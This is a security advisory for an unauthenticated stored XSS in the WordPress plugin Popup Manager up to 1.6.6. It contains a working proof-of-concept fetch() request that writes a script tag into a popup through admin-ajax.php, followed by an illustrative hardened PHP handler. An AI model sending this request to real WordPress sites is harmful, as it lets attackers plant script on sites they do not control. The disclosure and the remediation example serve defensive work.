Popup Manager <= 1.6.6 - Unauthenticated Stored XSS

Source: wpexploit
Author: Lana Codes
WPEX-ID: 7862084A-2821-4EF1-8D01-C9C8B3F28B05
Published: Nov 28, 2022 - 12:00 a.m. (2022-11-28 00:00:00)

Tags: stored xss, unauthenticated, popup manager, security vulnerability

EPSS: 0.001 (percentile 39.7%)

The plugin does not perform authorisation or CSRF checks when creating or updating popups, and is missing sanitisation as well as escaping, which could allow unauthenticated attackers to create arbitrary popups and add Stored XSS payloads as well.

fetch('/wp-admin/admin-ajax.php', {
    method: 'POST',
    headers: new Headers({
        'Content-Type': 'application/x-www-form-urlencoded',
    }),
    body: 'action=pm_save_data&form_action=update&form_id=1&form_name=vulnerability&form_data={"form_action":"undefined","popup_template":"text","popup_template_style":"","popup_location":"modal-popup","popup_timer":"0","popup_trigger":"timer","popup_entry_animation":"bounce","popup_exit_animation":"bounce","popup_title":"XSS","popup_disclaimer":"Try XSS","popup_text":"vulnerable"}&popup_html=<script>alert("XSS");</script>',
    redirect: 'follow'
})
    .then(response => response.text())
    .then(result => console.log(result))
    .catch(error => console.log('error', error));

This exploit script replaces the HTML of popup #1 with a script tag.
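The advisory names three missing controls in the pm_save_data handler: authorisation, a CSRF nonce check, and sanitisation/escaping of the stored popup fields. The handler below is an added example of how a WordPress admin-ajax endpoint for that action looks with all three in place; it is not Popup Manager's own code. The `wp_ajax_pm_save_data` hook name follows WordPress's `wp_ajax_{action}` convention for the `action=pm_save_data` parameter seen in the proof of concept; the option key `pm_popups`, the nonce action `pm_save_popup`, the `nonce` POST field and the render/enqueue helpers are assumptions made for illustration.

```php
<?php
/**
 * Added example, not the plugin's own code. Hook names follow the
 * wp_ajax_{action} convention; pm_popups, pm_save_popup and the helper
 * function names are assumed for illustration.
 */

// Register for logged-in users only. There is deliberately no
// wp_ajax_nopriv_pm_save_data hook: that hook is what would make the
// save handler reachable without a session.
add_action( 'wp_ajax_pm_save_data', 'pm_save_data_handler' );

function pm_save_data_handler() {
    // Authorisation: only users allowed to edit content may save popups.
    if ( ! current_user_can( 'edit_posts' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // CSRF: the request must carry a nonce issued to this user for this action.
    // check_ajax_referer() terminates the request if the nonce is missing or invalid.
    check_ajax_referer( 'pm_save_popup', 'nonce' );

    $form_id   = isset( $_POST['form_id'] ) ? absint( $_POST['form_id'] ) : 0;
    $form_name = isset( $_POST['form_name'] )
        ? sanitize_text_field( wp_unslash( $_POST['form_name'] ) ) : '';

    // Sanitisation: keep only the HTML a post author may use; <script> is dropped.
    $popup_html = isset( $_POST['popup_html'] )
        ? wp_kses_post( wp_unslash( $_POST['popup_html'] ) ) : '';

    // form_data arrives as a JSON string (see the PoC); decode it and keep
    // only known keys, each run through an appropriate sanitiser.
    $form_data = array();
    if ( isset( $_POST['form_data'] ) ) {
        $decoded = json_decode( wp_unslash( $_POST['form_data'] ), true );
        if ( is_array( $decoded ) ) {
            $text_keys = array( 'popup_template', 'popup_location', 'popup_trigger',
                                'popup_title', 'popup_disclaimer', 'popup_text' );
            foreach ( $text_keys as $key ) {
                if ( isset( $decoded[ $key ] ) ) {
                    $form_data[ $key ] = sanitize_text_field( $decoded[ $key ] );
                }
            }
            $form_data['popup_timer'] = isset( $decoded['popup_timer'] )
                ? absint( $decoded['popup_timer'] ) : 0;
        }
    }

    if ( 0 === $form_id ) {
        wp_send_json_error( 'invalid form_id', 400 );
    }

    $popups             = get_option( 'pm_popups', array() );
    $popups[ $form_id ] = array(
        'name'       => $form_name,
        'data'       => $form_data,
        'popup_html' => $popup_html,
    );
    update_option( 'pm_popups', $popups );
    wp_send_json_success( array( 'form_id' => $form_id ) );
}

// Escaping on output: stored values are escaped again where they are rendered,
// so data written to the option by any other code path cannot break out.
function pm_render_popup( $form_id ) {
    $popups = get_option( 'pm_popups', array() );
    if ( empty( $popups[ $form_id ] ) ) {
        return;
    }
    $popup = $popups[ $form_id ];
    echo '<div class="pm-popup" data-trigger="' . esc_attr( $popup['data']['popup_trigger'] ) . '">';
    echo '<h2>' . esc_html( $popup['data']['popup_title'] ) . '</h2>';
    echo wp_kses_post( $popup['popup_html'] );
    echo '</div>';
}

// The admin page's JavaScript receives the nonce it must send back as the
// "nonce" POST field.
add_action( 'admin_enqueue_scripts', function () {
    wp_enqueue_script( 'pm-admin', plugins_url( 'admin.js', __FILE__ ), array(), '1.0', true );
    wp_localize_script( 'pm-admin', 'pmAjax', array(
        'nonce' => wp_create_nonce( 'pm_save_popup' ),
    ) );
} );
```

With this shape, the proof-of-concept request above fails twice before any data is touched: admin-ajax.php returns `0` for an unknown action because no `nopriv` hook exists, and a logged-in request without a valid nonce is stopped by `check_ajax_referer()`. Even if a payload reached storage, `wp_kses_post()` strips the `<script>` element on save and again on output.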
